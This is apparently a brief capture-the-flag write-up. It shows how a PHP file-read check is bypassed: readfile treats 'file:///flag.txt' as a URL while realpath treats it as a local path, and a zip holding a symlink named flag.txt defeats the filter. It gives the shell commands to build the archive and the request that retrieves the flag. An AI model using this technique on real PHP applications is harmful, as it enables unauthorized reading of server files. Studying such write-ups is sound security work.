Rating: 5.0
Useful characteristics of PHP functions:
* The function `realpath` will expand symbolic links in the given path.
* The function `readfile` accepts an URL as the path of the file to read.
Therefore, `file:///flag.txt` will be treated as URL pointing at `/flag.txt` by `readfile`
while being treated as a file `flag.txt` in the directory `file:` by `realpath`.
Putting a symbolic link as `flag.txt` will eliminate a string `flag` from the result of `realpath` and bypass the check.
To exploit this point, create a file `file_flag.zip` via this commands:
```
mkdir file:
cd file:
touch meow.txt
ln -s meow.txt flag.txt
cd ..
zip -ry file_flag.zip file:
```
Then upload the file and access `http://65.108.176.76:8200/?file=file:///flag.txt` to get the flag.
